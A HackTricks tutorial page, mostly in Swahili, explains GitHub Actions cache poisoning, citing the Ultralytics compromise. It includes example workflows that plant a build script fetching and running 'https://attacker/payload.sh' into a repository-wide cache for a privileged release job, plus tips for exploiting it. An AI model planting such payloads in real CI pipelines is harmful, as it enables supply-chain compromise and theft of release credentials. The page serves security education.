GH Actions - Cache Poisoning

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Muhtasari

GitHub Actions cache inatumika kwa repository nzima. Workflow yoyote inayojua cache key (au restore-keys) inaweza kujaza ingizo hilo, hata kama job ina tu permissions: contents: read. GitHub haiagawani caches kwa workflow, aina ya event, au kiwango cha uaminifu, hivyo mshambuliaji ambaye anachukua udhibiti wa job yenye madaraka madogo anaweza poison a cache ambayo job ya release yenye idhini itarestore baadaye. Hii ndio jinsi Ultralytics compromise ilivyopitia kutoka workflow ya pull_request_target hadi pipeline ya kuchapisha PyPI.

Vipengele vya shambulio

  • actions/cache inatoa operesheni za restore na save (actions/cache@v4, actions/cache/save@v4, actions/cache/restore@v4). Muitikio wa save unaruhusiwa kwa job yoyote isipokuwa pull_request workflows zinazotumwa kutoka forks ambazo hazina uaminifu kabisa.
  • Vipengee vya cache vinatambulishwa kwa key pekee. restore-keys pana hufanya iwe rahisi ku-inject payloads kwa sababu mshambuliaji anahitaji tu kuangukia prefiksi.
  • Filesystem iliyohifadhiwa kwenye cache inarejeshwa bila mabadiliko. Ikiwa cache ina scripts au binaries zinazotekelezwa baadaye, mshambuliaji anadhibiti njia hiyo ya utekelezaji.

Mfano wa exploitation chain

Workflow ya mwandishi (pull_request_target) poisoned the cache:

steps:
- run: |
mkdir -p toolchain/bin
printf '#!/bin/sh\ncurl https://attacker/payload.sh | sh\n' > toolchain/bin/build
chmod +x toolchain/bin/build
- uses: actions/cache/save@v4
with:
path: toolchain
key: linux-build-${{ hashFiles('toolchain.lock') }}

Privileged workflow ilirejeshwa na kutekeleza cache iliyopigwa sumu:

steps:
- uses: actions/cache/restore@v4
with:
path: toolchain
key: linux-build-${{ hashFiles('toolchain.lock') }}
- run: toolchain/bin/build release.tar.gz

The second job now runs attacker-controlled code while holding release credentials (PyPI tokens, PATs, cloud deploy keys, etc.).

Vidokezo vya unyonyaji kwa vitendo

  • Lenga workflows zinazochochewa na pull_request_target, issue_comment, au bot commands ambazo bado zinahifadhi caches; GitHub inawawezesha kuandika juu ya repository-wide keys hata wakati runner ana read access tu kwenye repo.
  • Tafuta deterministic cache keys zinazotumika tena kuvuka trust boundaries (kwa mfano, pip-${{ hashFiles('poetry.lock') }}) au permissive restore-keys, kisha hifadhi tarball yako ya hasidi kabla workflow yenye ruhusa za juu ianze.
  • Monitor logs kwa ajili ya Cache saved entries au ongeza hatua yako ya cache-save ili next release job irestore payload na itekeleze scripts au binaries trojanized.

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks